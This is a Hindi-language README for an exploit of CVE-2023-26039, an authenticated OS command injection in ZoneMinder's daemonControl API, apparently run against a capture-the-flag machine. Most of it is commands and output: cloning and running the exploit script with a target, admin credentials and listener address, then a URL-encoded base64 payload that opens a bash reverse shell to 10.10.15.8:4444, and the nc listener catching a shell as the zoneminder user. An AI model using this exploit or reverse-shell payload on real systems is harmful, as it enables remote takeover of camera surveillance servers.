
CVE-2023-26039 - ZoneMinder. कोई भी प्रमाणित उपयोगकर्ता वेब उपयोगकर्ता के रूप में कोई भी शेल कमांड निष्पादित करने के लिए एक API कमांड बना सकता है।
ZoneMinder लिनक्स के लिए एक मुफ्त, ओपन सोर्स क्लोज्ड-सर्किट टेलीविज़न सॉफ्टवेयर एप्लिकेशन है जो IP, USB और एनालॉग कैमरों का समर्थन करता है। 1.36.33 और 1.37.33 से पहले के संस्करणों में /web/api/app/Controller/HostController.php में daemonControl() के माध्यम से OS कमांड इंजेक्शन मौजूद है। कोई भी प्रमाणित उपयोगकर्ता वेब उपयोगकर्ता के रूप में किसी भी शेल कमांड को निष्पादित करने के लिए एक api कमांड बना सकता है। यह समस्या संस्करण 1.36.33 और 1.37.33 में ठीक कर दी गई है।
git clone https://github.com/ungabunga-ctf/CVE-2023-26039
cd CVE-2023-26039
python3 -m venv venv
source venv/bin/activate
pip install requests
python3 CVE-2023-26039.py
python3 CVE-2023-26039.py
usage: CVE-2023-26039.py [-h] -t TARGET -u USERNAME -p PASSWORD [-c CMD] [-lh LHOST] [-lp LPORT]
CVE-2023-26039.py: error: the following arguments are required: -t/--target, -u/--username, -p/--password
पहले टर्मिनल में यह चलाएँ
python3 CVE-2023-26039.py -t http://localhost:8080 -u admin -p starcraft122490 -lh 10.10.15.8 -lp 4444
[+] Got token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJab25lTWluZGVyIiwiaWF0IjoxNzg0MzI4MzU3LCJleHAiOjE3ODQzMzU1NTcsInVzZXIiOiJhZG1pbiIsInR5cGUiOiJhY2Nlc3MifQ.BxB6EGkAyc_eaTg4JMYsbLqgmTCu-vh40l8HOoTNHcM...
http://localhost:8080/api/host/daemonControl/zmdc.pl.pl/%24%28echo%20%22YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNS44LzQ0NDQgMD4mMSc%3D%22%7Cbase64%20-d%7Cbash%29.json
और यह दूसरे टर्मिनल के लिए है
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.8] from (UNKNOWN) [10.129.230.42] 59380
bash: cannot set terminal process group (1080): Inappropriate ioctl for device
bash: no job control in this shell
zoneminder@surveillance:/usr/share/zoneminder/www/api/app/webroot$